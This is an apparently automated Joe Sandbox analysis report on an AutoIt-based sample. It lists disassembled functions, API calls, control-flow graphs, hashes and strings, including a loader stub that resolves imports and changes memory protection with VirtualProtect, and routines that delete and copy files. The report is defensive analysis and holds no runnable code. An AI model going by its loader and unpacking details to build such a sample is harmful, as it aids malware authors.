                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1045 b54e89-b54ea1 CreateStreamOnHGlobal 1046 b54ec1-b54ec6 1045->1046 1047 b54ea3-b54eba FindResourceExW 1045->1047 1048 b54ec0 1047->1048 1049 b8d933-b8d942 LoadResource 1047->1049 1048->1046 1049->1048 1050 b8d948-b8d956 SizeofResource 1049->1050 1050->1048 1051 b8d95c-b8d967 LockResource 1050->1051 1051->1048 1052 b8d96d-b8d98b 1051->1052 1052->1048
                                              APIs
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B54E99
                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B54D8E,?,?,00000000,00000000), ref: 00B54EB0
                                              • LoadResource.KERNEL32(?,00000000,?,?,00B54D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B54E2F), ref: 00B8D937
                                              • SizeofResource.KERNEL32(?,00000000,?,?,00B54D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B54E2F), ref: 00B8D94C
                                              • LockResource.KERNEL32(00B54D8E,?,?,00B54D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B54E2F,00000000), ref: 00B8D95F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                              • String ID: SCRIPT
                                              • API String ID: 3051347437-3967369404
                                              • Opcode ID: d27da2dbde1cd6160a86f5042ebacd12cfed8c1fa385aec243d18a43237c4ce5
                                              • Instruction ID: f9c6467a54eea3498d31bc3bf770d0c945514534443778d9f6e6d3d93c6a3b7b
                                              • Opcode Fuzzy Hash: d27da2dbde1cd6160a86f5042ebacd12cfed8c1fa385aec243d18a43237c4ce5
                                              • Instruction Fuzzy Hash: F4119E70200701BFD7258B65EC49F37BBFAFBC5B11F1482ADF80686260EB61E8448A60
                                              Function 00CB2A60 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1091 cb2a60-cb2a6d 1092 cb2a7a-cb2a7f 1091->1092 1093 cb2a81 1092->1093 1094 cb2a83 1093->1094 1095 cb2a70-cb2a75 1093->1095 1097 cb2a88-cb2a8a 1094->1097 1096 cb2a76-cb2a78 1095->1096 1096->1092 1096->1093 1098 cb2a8c-cb2a91 1097->1098 1099 cb2a93-cb2a97 1097->1099 1098->1099 1100 cb2a99 1099->1100 1101 cb2aa4-cb2aa7 1099->1101 1102 cb2a9b-cb2aa2 1100->1102 1103 cb2ac3-cb2ac8 1100->1103 1104 cb2aa9-cb2aae 1101->1104 1105 cb2ab0-cb2ab2 1101->1105 1102->1101 1102->1103 1106 cb2adb-cb2add 1103->1106 1107 cb2aca-cb2ad3 1103->1107 1104->1105 1105->1097 1110 cb2adf-cb2ae4 1106->1110 1111 cb2ae6 1106->1111 1108 cb2b4a-cb2b4d 1107->1108 1109 cb2ad5-cb2ad9 1107->1109 1112 cb2b52-cb2b55 1108->1112 1109->1111 1110->1111 1113 cb2ae8-cb2aeb 1111->1113 1114 cb2ab4-cb2ab6 1111->1114 1115 cb2b57-cb2b59 1112->1115 1116 cb2aed-cb2af2 1113->1116 1117 cb2af4 1113->1117 1118 cb2ab8-cb2abd 1114->1118 1119 cb2abf-cb2ac1 1114->1119 1115->1112 1120 cb2b5b-cb2b5e 1115->1120 1116->1117 1117->1114 1121 cb2af6-cb2af8 1117->1121 1118->1119 1122 cb2b15-cb2b24 1119->1122 1120->1112 1123 cb2b60-cb2b7c 1120->1123 1124 cb2afa-cb2aff 1121->1124 1125 cb2b01-cb2b05 1121->1125 1126 cb2b26-cb2b2d 1122->1126 1127 cb2b34-cb2b41 1122->1127 1123->1115 1130 cb2b7e 1123->1130 1124->1125 1125->1121 1131 cb2b07 1125->1131 1126->1126 1128 cb2b2f 1126->1128 1127->1127 1129 cb2b43-cb2b45 1127->1129 1128->1096 1129->1096 1132 cb2b84-cb2b88 1130->1132 1133 cb2b09-cb2b10 1131->1133 1134 cb2b12 1131->1134 1135 cb2b8a-cb2ba0 LoadLibraryA 1132->1135 1136 cb2bcf-cb2bd2 1132->1136 1133->1121 1133->1134 1134->1122 1138 cb2ba1-cb2ba6 1135->1138 1137 cb2bd5-cb2bdc 1136->1137 1139 cb2bde-cb2be0 1137->1139 1140 cb2c00-cb2c30 VirtualProtect * 2 1137->1140 1138->1132 1141 cb2ba8-cb2baa 1138->1141 1142 cb2bf3-cb2bfe 1139->1142 1143 cb2be2-cb2bf1 1139->1143 1144 cb2c34-cb2c38 1140->1144 1145 cb2bac-cb2bb2 1141->1145 1146 cb2bb3-cb2bc0 GetProcAddress 1141->1146 1142->1143 1143->1137 1144->1144 1147 cb2c3a 1144->1147 1145->1146 1148 cb2bc9 ExitProcess 1146->1148 1149 cb2bc2-cb2bc7 1146->1149 1149->1138
                                              APIs
                                              • LoadLibraryA.KERNEL32(?), ref: 00CB2B9A
                                              • GetProcAddress.KERNEL32(?,00CABFF9), ref: 00CB2BB8
                                              • ExitProcess.KERNEL32(?,00CABFF9), ref: 00CB2BC9
                                              • VirtualProtect.KERNELBASE(00B50000,00001000,00000004,?,00000000), ref: 00CB2C17
                                              • VirtualProtect.KERNELBASE(00B50000,00001000), ref: 00CB2C2C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                              • String ID:
                                              • API String ID: 1996367037-0
                                              • Opcode ID: f7649bca48d54fbb4d5f46f2128329ff7c3409fe8a7a178a3b209fb7db3d13b3
                                              • Instruction ID: dcc2312d98d8a7b6d5279f573ad6d886ce5a452523c0571976df9453da11183e
                                              • Opcode Fuzzy Hash: f7649bca48d54fbb4d5f46f2128329ff7c3409fe8a7a178a3b209fb7db3d13b3
                                              • Instruction Fuzzy Hash: 2D513772A553524BD7349EB8CCC06E1BBA4EB15324F280738C5F2CB3C6EBA45D0697A0
                                              Function 00BB445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00B8E398), ref: 00BB446A
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00BB447B
                                              • FindClose.KERNEL32(00000000), ref: 00BB448B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FileFind$AttributesCloseFirst
                                              • String ID:
                                              • API String ID: 48322524-0
                                              • Opcode ID: 7dd5904be97a56a07406d824fd865882563f7b46c3c0ed82448e8e063369b432
                                              • Instruction ID: ec07c44c86e87c5da325d1d17042b70774d1bec61969d29a2a6664219b07f6a0
                                              • Opcode Fuzzy Hash: 7dd5904be97a56a07406d824fd865882563f7b46c3c0ed82448e8e063369b432
                                              • Instruction Fuzzy Hash: 5EE0D8324155016B42106B38EC4D4F9B79CEE05335F100766F836C21D0FFB459109595
                                              Function 00B609D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B60A5B
                                              • timeGetTime.WINMM ref: 00B60D16
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B60E53
                                              • Sleep.KERNEL32(0000000A), ref: 00B60E61
                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 00B60EFA
                                              • DestroyWindow.USER32 ref: 00B60F06
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B60F20
                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00B94E83
                                              • TranslateMessage.USER32(?), ref: 00B95C60
                                              • DispatchMessageW.USER32(?), ref: 00B95C6E
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B95C82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                              • API String ID: 4212290369-3242690629
                                              • Opcode ID: 0aeca4524dbf1a892957b01eee2075d47ff3e817545c89b2ec50db78db497036
                                              • Instruction ID: 3113808b4cc884c5e4316c7baa4c015fc4087e75e14ff2311b3a452a995ed691
                                              • Opcode Fuzzy Hash: 0aeca4524dbf1a892957b01eee2075d47ff3e817545c89b2ec50db78db497036
                                              • Instruction Fuzzy Hash: 51B2D170608741DFDB35DF24C884BAAB7E4FF85304F1489ADE99A972A1DB74E844CB42
                                              Function 00BB9155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00BB8F5F: __time64.LIBCMT ref: 00BB8F69
                                                • Part of subcall function 00B54EE5: _fseek.LIBCMT ref: 00B54EFD
                                              • __wsplitpath.LIBCMT ref: 00BB9234
                                                • Part of subcall function 00B740FB: __wsplitpath_helper.LIBCMT ref: 00B7413B
                                              • _wcscpy.LIBCMT ref: 00BB9247
                                              • _wcscat.LIBCMT ref: 00BB925A
                                              • __wsplitpath.LIBCMT ref: 00BB927F
                                              • _wcscat.LIBCMT ref: 00BB9295
                                              • _wcscat.LIBCMT ref: 00BB92A8
                                                • Part of subcall function 00BB8FA5: _memmove.LIBCMT ref: 00BB8FDE
                                                • Part of subcall function 00BB8FA5: _memmove.LIBCMT ref: 00BB8FED
                                              • _wcscmp.LIBCMT ref: 00BB91EF
                                                • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9824
                                                • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9837
                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BB9452
                                              • _wcsncpy.LIBCMT ref: 00BB94C5
                                              • DeleteFileW.KERNEL32(?,?), ref: 00BB94FB
                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00BB9511
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BB9522
                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BB9534
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                              • String ID:
                                              • API String ID: 1500180987-0
                                              • Opcode ID: c20255474d3bfcdb93c2cc4791eddd5ffed6a65fdfac98f318743ae2f6a23a2a
                                              • Instruction ID: fe89da570ea05df686e9d6f6d1018750074245d132b143f23584ddd579df2b31
                                              • Opcode Fuzzy Hash: c20255474d3bfcdb93c2cc4791eddd5ffed6a65fdfac98f318743ae2f6a23a2a
                                              • Instruction Fuzzy Hash: ABC129B1D00219ABDF21DFA5CC85AEEB7F9EF55310F0040EAF609E6151EB709A848F65
                                              Function 00B5708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00B54706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C152F8,?,00B537AE,?), ref: 00B54724
                                                • Part of subcall function 00B7050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00B57165), ref: 00B7052D
                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B571A8
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B8E8C8
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B8E909
                                              • RegCloseKey.ADVAPI32(?), ref: 00B8E947
                                              • _wcscat.LIBCMT ref: 00B8E9A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                              • API String ID: 2673923337-2727554177
                                              • Opcode ID: c2a024640af834db10de01c1b59ec6c1bc09d4812ca74a06097f9272253bfefe
                                              • Instruction ID: 95e4247cf390664c1cd1a98421725f11dc6e64cb45bb2b242dd18a93d69f0e41
                                              • Opcode Fuzzy Hash: c2a024640af834db10de01c1b59ec6c1bc09d4812ca74a06097f9272253bfefe
                                              • Instruction Fuzzy Hash: 41718E715093019EC310EF65E841BAFBBE8FF86350B4089AEF855872B0EB719948CB52
                                              Function 00B53A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00B53A50
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00B53A5F
                                              • LoadIconW.USER32(00000063), ref: 00B53A76
                                              • LoadIconW.USER32(000000A4), ref: 00B53A88
                                              • LoadIconW.USER32(000000A2), ref: 00B53A9A
                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B53AC0
                                              • RegisterClassExW.USER32(?), ref: 00B53B16
                                                • Part of subcall function 00B53041: GetSysColorBrush.USER32(0000000F), ref: 00B53074
                                                • Part of subcall function 00B53041: RegisterClassExW.USER32(00000030), ref: 00B5309E
                                                • Part of subcall function 00B53041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00B530AF
                                                • Part of subcall function 00B53041: LoadIconW.USER32(000000A9), ref: 00B530F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                              • String ID: #$0$AutoIt v3
                                              • API String ID: 2880975755-4155596026
                                              • Opcode ID: de126838c3da66eef181e169c60aecb6e1ee504400c18125f5930ab2becbad95
                                              • Instruction ID: bf476b22b2713d337e84bfe596b45cbaba645da199cf42a221af1dd8ddf54a63
                                              • Opcode Fuzzy Hash: de126838c3da66eef181e169c60aecb6e1ee504400c18125f5930ab2becbad95
                                              • Instruction Fuzzy Hash: 90212772905309EFEB10DFA4EC49BDD7BF0FB49711F00816AE500A72A1D7B55A448B84
                                              Function 00B53766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                              • API String ID: 1825951767-3513169116
                                              • Opcode ID: 0c21d5394ef0570bff6f998391bd297f753c781614a7885f4b02212773210e3c
                                              • Instruction ID: aa0e5034db6873fba490870bac995b4fc435fa5ef4e2a0c37e90ed15c4929c5e
                                              • Opcode Fuzzy Hash: 0c21d5394ef0570bff6f998391bd297f753c781614a7885f4b02212773210e3c
                                              • Instruction Fuzzy Hash: E7A15D7290021D9ADB05EBA0DC95BEEB7F8FF15741F4404EAE816B7291EF745A08CB60
                                              Function 00B53015 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70registrywindowclipboardCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00B53074
                                              • RegisterClassExW.USER32(00000030), ref: 00B5309E
                                              • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00B530AF
                                              • LoadIconW.USER32(000000A9), ref: 00B530F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 975902462-1005189915
                                              • Opcode ID: cf101e31d55d54ceed5b3322889bf59afd932def85a222bd152f121fbd681172
                                              • Instruction ID: f2592dde1d8f4ead1a1041fd1c0a307f7c08d0e98946d9dccf54e014f753dbc9
                                              • Opcode Fuzzy Hash: cf101e31d55d54ceed5b3322889bf59afd932def85a222bd152f121fbd681172
                                              • Instruction Fuzzy Hash: 1A3105B294520AEFDB10CFA8E884BDDBBF0FB09310F14856AE581A72A0E7B54585CF51
                                              Function 00B53041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54registrywindowclipboardCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00B53074
                                              • RegisterClassExW.USER32(00000030), ref: 00B5309E
                                              • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00B530AF
                                              • LoadIconW.USER32(000000A9), ref: 00B530F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 975902462-1005189915
                                              • Opcode ID: a44db909cbd3b547b3d43918e7b9604076ab966de72c0f77615a0c7882d4e0de
                                              • Instruction ID: 1bc16959a85319d780181f76aca4d913680aa39920246f6309326c14814f60ce
                                              • Opcode Fuzzy Hash: a44db909cbd3b547b3d43918e7b9604076ab966de72c0f77615a0c7882d4e0de
                                              • Instruction Fuzzy Hash: CC21C5B5D55619EFEB00DFA4E849BEDBBF4FB09700F00812AF911A72A0EBB145448F95
                                              Function 01007FA0 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
